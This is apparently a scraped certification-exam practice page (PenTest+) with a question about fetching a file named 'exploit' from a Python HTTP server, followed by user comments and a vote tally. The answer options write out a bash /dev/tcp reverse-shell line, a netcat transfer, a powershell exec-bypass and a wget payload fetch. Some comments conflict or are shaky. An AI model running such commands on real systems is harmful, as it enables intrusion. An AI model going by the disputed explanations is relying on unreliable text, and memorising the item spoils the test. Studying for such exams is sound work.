A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution?
A.
nc 10.10.51.50 9891 < exploit
B.
powershell -exec bypass -f \\10.10.51.50\9891
C.
bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
D. wget 10.10.51.50:9891/exploit
The command "python -m SimpleHTTPServer 9891" starts a simple HTTP server on the machine it's executed on, on port 9891. This means that the file "exploit" would be served on the IP address of the machine on port 9891.
To download the file "exploit" from the HTTP server that was started, the command "wget 10.10.51.50:9891/exploit" can be used. This command uses the wget utility to download files from the web via HTTP, HTTPS and FTP. In this case, it's connecting to the IP address 10.10.51.50 and port 9891, where the exploit file is hosted and download the file.
Option A doesn't work because the command "nc" (netcat) is a tool that can be used to read and write data across a network, it's not used to download files. Option B and C are not valid commands that can be used to download files from a web server.
The command "python -m SimpleHTTPServer 9891" starts a web server on the staging server, listening on port 9891. This allows clients to download files from the server using HTTP.
I think this question is malformed, but ok.
The meaning of the question is:
I start a webserver on VM1 and I want to grab a file like "exploted_password.txt" from the webserver(VM1) to my machine.
That's why the perfect answer is D wget (or curl).
B. "\\10.10.51.50" it's a not valid path to download files from an HTTP Server, here is a windows shared directory path.
C. Good to create an inverse shell, but not valid to download files from an HTTP Server
A. tricky answer... Not good for a lot of reasons:
+ this command is sending "exploited_password.txt" TO the webserver, and not getting it FROM the webserver
+ netcat is not properly used to send file on a webserver, you could but in different way like
on my machine: I execute a netcat for waiting a file
on VM1: I execute a netcat to send a file.
But that means I don't need to open a webserver.
The command "bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit" redirects a Bash shell to the network address 10.10.51.50 on port 9891. This allows you to send and receive data over the network and can be used to exploit vulnerable services.
The command "python -m SimpleHTTPServer 9891" starts a web server using the Python SimpleHTTPServer module. It binds the web server to port 9891, making it accessible through localhost on your computer. The server can be accessed from other computers by using the IP address of your computer along with the port number.
This section is not available anymore. Please use the main Exam Page.PT0-002 Exam Questions
Log in to ExamTopics
Sign in:
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.
Upvoting a comment with a selected answer will also increase the vote count towards that answer by one.
So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.
Neolot
Highly Voted 2 years, 6 months agoRRabbit_111
Highly Voted 7 months, 1 week agoPractice_all
Most Recent 3 months agoThe_F00L
7 months, 1 week agocy_analyst
7 months, 1 week agoMeisAdriano
7 months, 1 week agonickwen007
2 years, 1 month agonickwen007
2 years, 1 month agodcyberguy
2 years, 6 months ago